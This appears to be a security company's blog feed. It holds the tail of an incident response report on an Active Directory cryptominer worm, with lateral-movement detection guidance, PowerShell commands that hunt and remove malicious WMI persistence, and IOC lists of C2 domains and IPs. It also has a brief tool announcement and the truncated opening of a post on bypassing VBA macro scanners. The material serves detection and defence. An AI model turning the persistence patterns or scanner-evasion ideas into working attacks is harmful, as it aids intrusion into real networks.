&lt;p&gt;“The &lt;em&gt;&lt;strong&gt;64-bit versions of Vista&lt;/strong&gt;&lt;/em&gt; require that all device &lt;em&gt;&lt;strong&gt;drivers be digitally&lt;/strong&gt;&lt;/em&gt; signed, so that the creator of the driver can be identified” &lt;a href=&quot;https://en.wikipedia.org/wiki/Windows_Vista&quot;&gt;wikipedia&lt;/a&gt; 2006.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;“Starting with new installations of Windows 10, version 1607, the previously defined driver signing rules will be enforced by the Operating System, and &lt;em&gt;&lt;strong&gt;Windows 10, version 1607 will not load any new kernel mode drivers which are not signed by the Dev Portal&lt;/strong&gt;&lt;/em&gt;. OS signing enforcement is only for new OS installations; systems upgraded from an earlier OS to Windows 10, version 1607 will not be affected by this change.” &lt;a href=&quot;https://techcommunity.microsoft.com/t5/windows-hardware-certification/driver-signing-changes-in-windows-10-version-1607/ba-p/364894&quot;&gt;techcommunity.microsoft.com&lt;/a&gt; Jul 26, 2016&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;a href=&quot;https://posts.specterops.io/mimidrv-in-depth-4d273d19e148&quot;&gt;More technical details&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3.Detection&lt;/strong&gt;&lt;/h1&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Detecting Lateral Movements and persistences&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Due to the complexity of corporate networks it is common to spot an attacker from an unmonitored internal network. The detection carried out in this phase of the killchain is much more complex due to false positives and unknown/poorly documented protocols.&lt;/p&gt;
&lt;p&gt;A common approach used is to identify the effects of a lateral movement, therefore the activities of the malware installed on board through blacklisted IOCs, anomalous network and host activities.&lt;/p&gt;
&lt;p&gt;So what are the benefits of identifying lateral movements?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The attacker does not necessarily perform the same actions on all machines. In this scenario, for example, some distinctions were made for both domain controllers, 64 and 32-bit hosts.&lt;/li&gt;
&lt;li&gt;In the absence of vulnerabilities, lateral movements are carried out through Microsoft internal network protocols, these protocols have in many cases some juicy plain text information.&lt;/li&gt;
&lt;li&gt;In some cases it is possible to delete a persistence created remotely on the target before the malware is executed for the first time.&lt;/li&gt;
&lt;li&gt;Studying the lateral movement can allow us to contain host infection in the response phase.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Where the detection IOCs produces a high number of false positives it is possible to use these indicators to carry out threat hunting activities&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;To detect lateral movements &lt;em&gt;&lt;strong&gt;through network traffic&lt;/strong&gt;&lt;/em&gt; it is necessary to receive infralan traffic on a network sensor, this is difficult due to the volume of traffic but theoretically possible through &lt;a href=&quot;https://www.fortinet.com/solutions/enterprise-midsize-business/scalable-flexible-segmentation&quot;&gt;internal network segmentation&lt;/a&gt;. However, even if it is only a small part, it is possible to identify the internal traffic passing through the firewall.&lt;/p&gt;
&lt;p&gt;Since the first analyzes we have identified that the attacker used the following MS-RPCE network sub-protocols to perform lateral movements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f&quot;&gt;MS-SCMR&lt;/a&gt;, through CreateServiceW,StartServiceW and DeleteService operations. This traffic is completely in plain text if used via &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes&quot;&gt;named pipe&lt;/a&gt; over &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5606ad47-5ee0-437a-817e-70c366052962&quot;&gt;MS-SMB2&lt;/a&gt;. Among the main information in clear text we find the name of the service and the command executed. MS-RPC over TCP traffic is normally preferred over MS-RPC over named pipes but in this case the attacker forces the traffic on the 445.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wmi/7a50647a-5311-41c2-8f4f-83bcfb497877&quot;&gt;MS-WMI&lt;/a&gt; through ExecMethod operation, encrypted by default but traceable through timestamp, authentication and MS-RPC operation names.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/eb12c947-7e20-4a30-a528-85bc433cec44&quot;&gt;MS-TSCH&lt;/a&gt; through SchRpcRegisterTask, SchRpcRun, SchRpcEnableTask, SchRpcDelete operations, encrypted by default but traceable in the same way of WMI protocol.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Together with &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/winrm/portal&quot;&gt;WinRM&lt;/a&gt; they are the main protocols used to perform lateral movements, this is because in case the target uses the windows firewall they are often enabled for systemic reasons. For this reasoning, the most widely used protocol, enabled by default in each domain is SCMR, used for example by the
&lt;a href=&quot;https://learn.microsoft.com/en-us/sysinternals/downloads/psexec&quot;&gt;PsExec&lt;/a&gt; utility and supported by any malware or redteam tool to perform lateral movements&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note: In scenarios where the windows firewall is disabled the possible lateral movement techniques are a lot&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;To track this type of activity it is possible to do it over the network or aboard the host.&lt;/p&gt;
&lt;p&gt;To correlate information on the host it is possible to proceed with an EDR, with Sysmon or through Windows Eventlogs. Since we do not believe that collecting logs alone without Sysmon is enough, we will assume that either an advanced EDR or Sysmon is present on the machines.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note: &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing&quot;&gt;ETW&lt;/a&gt; and &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter2&quot;&gt;Audit Policy Windows event logs Categories &lt;/a&gt; are considered out of scope since they are not supported by main security tools functions to perform detection and threat hunting&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Through the host it is necessary to correlate the connections of the following processes:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;svchost -k RPCSS&lt;/strong&gt;&lt;/em&gt; : MS-RPC over TCP ( 135 TCP , 593 HTTPS )&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;ntoskrnl.exe&lt;/strong&gt;&lt;/em&gt; : MS-RPC over named pipes (139 TCP, 445 TCP)&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;NB The first phase of an MS-RPC connection, the endpoint mapper (EPM), although reachable through a named pipe is usually available through TCP&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Correlate authenticated sessions and the actions performed by the following processes:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Remote Task Creation&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Modifications of this filesystem path by &quot; &lt;em&gt;&lt;strong&gt;C:\windows\system32\svchost.exe -k netsvcs ( -p -s Schedule&lt;/strong&gt;&lt;/em&gt; on recent OS)&quot;: C:\windows\system32\tasks*&lt;/p&gt;
&lt;p&gt;Modifications of this registry paths by the same process:&lt;/p&gt;
&lt;p&gt;software\microsoft\windows\ nt\currentversion\schedule\taskcache*\path
software\microsoft\windows\ nt\currentversion\schedule\taskcache\tree*&lt;/p&gt;
&lt;p&gt;The task is spawned as a child of one of the following processes depending on the operating system:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;C:\windows\system32\svchost.exe -k netsvcs&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;C:\windows\system32\taskeng.exe&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;EventLogs: &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624&quot;&gt;4624&lt;/a&gt; and &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4672&quot;&gt;4672&lt;/a&gt; and from &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4698&quot;&gt;4698&lt;/a&gt; to &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4672&quot;&gt;4702&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Remote Service Creation&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Modifications of this registry paths by &lt;em&gt;&lt;strong&gt;services.exe&lt;/strong&gt;&lt;/em&gt;:&lt;/p&gt;
&lt;p&gt;System\ControlSet001\Services*\imagepath&lt;/p&gt;
&lt;p&gt;In the registry path before the imagepath there will be the name of the service.&lt;/p&gt;
&lt;p&gt;This indicator also allows us to identify a variant of this technique that plans to modify a pre-existing service through ChangeServiceConfig* operations in order to stay under the radar: &lt;a href=&quot;https://github.com/Mr-Un1k0d3r/SCShell&quot;&gt;Remote Service Modification&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The malware process, that is the malicious service, will be spawned as a child of services.exe&lt;/p&gt;
&lt;p&gt;EventLogs: &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624&quot;&gt;4624&lt;/a&gt; and &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4672&quot;&gt;4672&lt;/a&gt; and &lt;a href=&quot;https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697&quot;&gt;4697&lt;/a&gt; or 7045&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Remote Process Creation through &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process&quot;&gt;Win32_Process&lt;/a&gt; and WMI Event Subscription&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Since there is no persistence, the creation of the remote process can be identified by directly correlating the child processes of &lt;em&gt;&lt;strong&gt;wmiprvse.exe&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;In case of persistence it is possible to detect the modification by  &lt;em&gt;&lt;strong&gt;C:\Windows\system32\svchost.exe -k netsvcs&lt;/strong&gt;&lt;/em&gt; of the following registry key:&lt;/p&gt;
&lt;p&gt;software\microsoft\wbem\ess*cimv2&lt;/p&gt;
&lt;p&gt;The data is saved in these files from C:\Windows\system32\svchost.exe -k netsvcs -p -s &lt;em&gt;&lt;strong&gt;Winmgmt&lt;/strong&gt;&lt;/em&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;C:\Windows\System32\wbem\Repository\OBJECTS.DATA&lt;/li&gt;
&lt;li&gt;C:\Windows\System32\wbem\Repository\INDEX.BTR&lt;/li&gt;
&lt;li&gt;C:\Windows\System32\wbem\Repository\MAPPING&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Unfortunately these files are modified too frequently for other reasons and they make too many false positives also for threat hunting operations, we therefore recommend using the registry key.&lt;/p&gt;
&lt;p&gt;Detect malware interactively:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;powershell /c &quot;Get-WMIObject -Namespace root\Subscription -Class __EventConsumer | ? { $_.CommandLineTemplate -Match \&quot;.*powershell.*-W\ Hidden\ .*\ -E\ \&quot;}&quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;powershell &quot;Get-CimClass -NameSpace &apos;root\default&apos; | ? {$_.CimClassName -Match &apos;systemcore_updater&apos;}&quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;findstr /i &quot;powershell.exe Event8&quot; C:\Windows\System32\wbem\Repository\OBJECTS.DATA&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Sysmon events:&lt;a href=&quot;https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected&quot;&gt;from 19 to 21&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Detecting Infected Hosts&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Despite the complexity of the attack in this case it was rather easy to detect infected hosts.&lt;/p&gt;
&lt;p&gt;Excluding the most recent versions of the malware, most of the C&amp;#x26;C are present in the main blacklists. Through good threat intelligence it is possible to find the indicators automatically and detect these network activities.&lt;/p&gt;
&lt;p&gt;Detect at network level hosts where the miners was running via plaintext  json-rpc usage is trivial and it is a very strong indicator for most of the widespread miners.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4.Response&lt;/strong&gt;&lt;/h1&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Containment&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Once learned that the malware was a distributed cryptominer worm, for the most critical situations we have decided to apply &lt;em&gt;&lt;strong&gt;Certego&apos;s lockdown procedures&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;These procedures rely on enabling, managing and exploiting windows firewall and some of its dependencies to selectively block the protocols used by the malware to perform lateral movements maintaining proper functioning of Active Directory.&lt;/p&gt;
&lt;p&gt;These procedures along with network-wide restrictions on the firewall and our telemetry systems allowed to block lateral movements and C&amp;#x26;C activities keeping the network under close monitoring, giving us time to carry out the necessary analysis.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Malware Removal&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Once the malware was isolated, it was trivial to remove it. For older versions it was enough to simply manually remove the persistence using the following commands:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;powershell /c &quot;Get-WMIObject -Namespace root\Subscription -Class __EventConsumer | ? { $_.CommandLineTemplate -Match \&quot;.*powershell.*-W\ Hidden\ .*\ -E\ \&quot;} | Remove-WmiObject -Verbose&quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;powershell &quot;([WmiClass] &apos;root\default:systemcore_Updater8&apos;) | Remove-WmiObject -Verbose&quot;&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Considering that the action is irreversible, we recommend that you first check with the commands present in the detection that it is not a false positive***.&lt;/p&gt;
&lt;p&gt;Once persistence is removed a good updated antivirus is usually enough to kill most of other malware components. If the components have just been updated it is common that the antivirus is not able to kill them. In that case we recommend that you look for the indicators described in the malware execution part.&lt;/p&gt;
&lt;p&gt;# &lt;strong&gt;5.Conclusions&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Given the rapidity of intervention, we cannot exclude that the malware is able to drop other threats in addition to those observed. However, we have not found any other types of malware other than those listed in this article.&lt;/p&gt;
&lt;p&gt;We have handled a large number of Active Directory compromises based on this type of cryptominer worm. The attacker&apos;s goal seems to be to periodically update cryptominers on all machines in the domain through domain controllers causing a periodic denial of service on &lt;em&gt;&lt;strong&gt;the whole domain&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;More and more actors begin to perform lateral movements and to exploit AD mechanisms to achieve their goal. Knowing these mechanisms is now an essential prerequisite for managing this type of threats.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;6.IOCs&lt;/strong&gt;&lt;/h1&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Hashes&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;0367064d9585cc5c8b8eff127d9565d0&quot;&gt;&lt;pre class=&quot;language-0367064d9585cc5c8b8eff127d9565d0&quot;&gt;&lt;code class=&quot;language-0367064d9585cc5c8b8eff127d9565d0&quot;&gt;52f510d047e6270c9b916d76725529c8
7e0bc1c01f44c7a663d82e4aff71ee6c
91ff884cff84cb44fb259f5caa30e066
98deacafd4a35fc257d2f381f78b9b3b
d129842ccf642d1e71c5e851c0ced337
d1aed5a1726d278d521d320d082c3e1e
fd044540a38b3422abf275af9e6ab3c2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Domains/IPs&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;profetestruec[.]net&quot;&gt;&lt;pre class=&quot;language-profetestruec[.]net&quot;&gt;&lt;code class=&quot;language-profetestruec[.]net&quot;&gt;sjjjv[.]xyz
winupdate.firewall-gateway[.]de
dfdfjkbcv[.]net
51.15.65[.]182
51.255.34[.]118
213.32.29[.]143
217.182.169[.]148
45.10.69[.]141
45.140.88[.]145
5.196.23[.]240
51.15.54[.]102
205.209.152[.]78&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Ports&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;3333&quot;&gt;&lt;pre class=&quot;language-3333&quot;&gt;&lt;code class=&quot;language-3333&quot;&gt;5555
7777
8000
14444
14443
49636&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Web resources&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;/update&quot;&gt;&lt;pre class=&quot;language-/update&quot;&gt;&lt;code class=&quot;language-/update&quot;&gt;/sync
/banner&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;WMI class&lt;/strong&gt;&lt;/em&gt;: root\default:systemcore_Updater8&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;WMI filter names&lt;/strong&gt;&lt;/em&gt;: &quot;SCM Event8 Log Filter&quot; or &quot;SCM Event8 Log Filter2&quot;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;WMI consumer names&lt;/strong&gt;&lt;/em&gt;: &quot;SCM Event8 Log Consumer&quot; or &quot;SCM Event8 Log Consumer2&quot;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Task Name&lt;/strong&gt;&lt;/em&gt;: sysupdater0&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;7.About the author&lt;/strong&gt;&lt;/h1&gt;
&lt;h3&gt;Gabriele Pippi &lt;a href=&quot;https://twitter.com/gabriele_pippi&quot;&gt;(Twitter)&lt;/a&gt;.&lt;/h3&gt;
&lt;h1&gt;&lt;strong&gt;8.Credits&lt;/strong&gt;&lt;/h1&gt;
&lt;h3&gt;Thanks to Davide Setti &lt;a href=&quot;https://twitter.com/settidavide89i&quot;&gt;(Twitter)&lt;/a&gt; and Marco Giovanetti &lt;a href=&quot;https://twitter.com/mgiovamo&quot;&gt;(Twitter)&lt;/a&gt; for the collaboration.&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Introducing PcapMonkey]]></title><description><![CDATA[An easy way to analyze pcap using the latest version of Suricata and Zeek]]></description><link>https://www.certego.net/blog/blog-3/</link><guid isPermaLink="false">blog-3</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Federico Foschini]]></dc:creator><pubDate>Sun, 27 Sep 2020 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/certego/PcapMonkey&quot;&gt;PcapMonkey&lt;/a&gt; is a project that will provide an easy way to analyze pcap using the latest version of Suricata and Zeek.&lt;/p&gt;
&lt;p&gt;It can also save Suricata and Zeek logs in Elasticsearch using the new Elasticsearch Common Schema or the original field names. PcapMonkey uses official docker containers (when available) for most images and aims to be easy and straightforward to use.&lt;/p&gt;
&lt;h2&gt;Features&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;PcapMonkey let&apos;s you run one or multiple pcaps and imports all logs to elasticsearch.&lt;/li&gt;
&lt;li&gt;PcapMonkey keeps the &quot;official&quot; Zeek and Suricata fields names so you can look them up on the official documentation&lt;/li&gt;
&lt;li&gt;It let you edit directly Suricata and Zeek configuration and scripts so you can test quickly new features&lt;/li&gt;
&lt;li&gt;PcapMonkey comes with some very useful Zeek scripts like Ja3 and File extractor&lt;/li&gt;
&lt;li&gt;It&apos;s possible to enable logging in ECS to leverage all ElasticSerch SIEM features&lt;/li&gt;
&lt;li&gt;Let&apos;s you import also windows event files (BETA)&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Advanced VBA macros: bypassing olevba static analyses with 0 hits]]></title><description><![CDATA[One of the most common techniques for getting a foothold on a network client is based on  Office files containing a malicious VBA macro. VBA macros are still widely used in a business context and, despite the mitigations offered by security vendors and Microsoft, it is still essential to detect evasion techniques in order to catch smart attackers.]]></description><link>https://www.certego.net/blog/advanced-vba-macros-bypassing-olevba-static-analyses/</link><guid isPermaLink="false">advanced-vba-macros-bypassing-olevba-static-analyses</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Gabriele Pippi, Threat Research Lead Engineer]]></dc:creator><pubDate>Tue, 07 Jul 2020 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Tests scope&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;APT macro analyses&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Observations&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Tests carried out&lt;/strong&gt;&lt;/em&gt;:
&lt;ul&gt;
&lt;li&gt;Bypassing CreateObject detection&lt;/li&gt;
&lt;li&gt;Crafting our easy custom undetected obfuscation&lt;/li&gt;
&lt;li&gt;Killing ViperMonkey&lt;/li&gt;
&lt;li&gt;Undetected code execution methods/functions&lt;/li&gt;
&lt;li&gt;Undetected methods/functions to get our malicious file&lt;/li&gt;
&lt;li&gt;Undetected autoexec sub events&lt;/li&gt;
&lt;li&gt;Results&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Suggestions for improvement&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Conclusions&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;About the author&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;&lt;strong&gt;1.Introduction&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;One of the most common techniques for getting a foothold on a network client is based on &lt;a href=&quot;https://attack.mitre.org/techniques/T1064/&quot;&gt;Office files containing a malicious VBA macro&lt;/a&gt;.
&lt;a href=&quot;https://en.wikipedia.org/wiki/Visual_Basic_for_Applications&quot;&gt;VBA&lt;/a&gt; macros are still widely used in a business context and, despite the mitigations offered by security vendors and Microsoft, &lt;em&gt;&lt;strong&gt;it is still essential to detect evasion techniques in order to catch smart attackers&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;On the attacker&apos;s side, there is plenty of public projects to setup, weaponize and obfuscate a macro while on the defenser&apos;s side there is a reasonable number of public projects, among the most famous projects to de-obfuscate and detect malicious VBA macro there are certainly &lt;a href=&quot;https://github.com/decalage2/oletools/wiki/olevba&quot;&gt;olevba&lt;/a&gt;, &lt;a href=&quot;https://github.com/decalage2/oletools/wiki/mraptor&quot;&gt;MacroRaptor&lt;/a&gt; and &lt;a href=&quot;https://github.com/decalage2/ViperMonkey&quot;&gt;ViperMonkey&lt;/a&gt;. At Certego, we also use these tools to perform automatic static analysis of VBA macro.&lt;/p&gt;
&lt;p&gt;Today we would like to share a test carried out last week on the resilience of public logic offered by olevba, mraptor and vipermonkey. These tests were even more motivated by some autoexec sub functions identified in the wild that were not detected by our implementation of olevba.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;All the tests carried out are aimed at encouraging the red teams to test new bypass techniques and improving the detection of olevba, mraptor and vipermonkey public projects&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;2.Tests scope&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;All tests were carried out on a fully patched Windows 10 client with last build and version.&lt;/li&gt;
&lt;li&gt;Macro based PoCs must work with &lt;a href=&quot;https://en.wikipedia.org/wiki/Mandatory_Integrity_Control&quot;&gt;medium integrity level&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;The tests carried out focus on the static analysis that can be performed by mraptor and olevba; in these tests we will consider out of scope the dynamic analysis from the point of view of a sandbox, an EDR and any &lt;a href=&quot;https://learn.microsoft.com/it-it/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide&quot;&gt;ASR&lt;/a&gt; bypass.&lt;/li&gt;
&lt;li&gt;During the tests, we decided to include vipermonkey vba emulator in the scope.&lt;/li&gt;
&lt;li&gt;All the tests carried out start from the assumption that the latest versions of olevba, mraptor and vmonkey have been implemented out of the box.&lt;/li&gt;
&lt;li&gt;Common users are not always able to complete certain tasks keeping all ASR rules enabled, for this reason we consider disabled at least the following rules:
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/it-it/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide#block-all-office-applications-from-creating-child-processes&quot;&gt;Block all Office applications from creating child processes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/it-it/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide#block-office-applications-from-creating-executable-content&quot;&gt;Block Office applications from creating executable content&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;3.APT macro analyses&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;There are many ways to obfuscate a VBA macro, but how much do I have to obfuscate my macro to completely evade the analyses of a prepared blue team? It is important to know the weak points of a VBA obfuscation/evasion technique in order to detect it.&lt;/p&gt;
&lt;p&gt;We started by learning from public examples of high-level attacks, then by analyzing through the tools mentioned above some noteworthy APT macro samples.&lt;/p&gt;
&lt;p&gt;We decided to report the following three examples:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;2019-06-06 &lt;a href=&quot;https://www.virustotal.com/gui/file/d21318282e6c8d888b686fb61d87891fff4df575a8a84ea1d2784c0445409cdc/detection&quot;&gt;gorodpavlodar.doc&lt;/a&gt; from &lt;a href=&quot;https://attack.mitre.org/groups/G0007/&quot;&gt;APT28&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;APT28 is one of the groups with advanced &lt;a href=&quot;https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures&quot;&gt;TTPs&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;VBA code:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/cfb39a4f47c0186c86648b2074801556/7131f/AdvancedVBAmacros1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
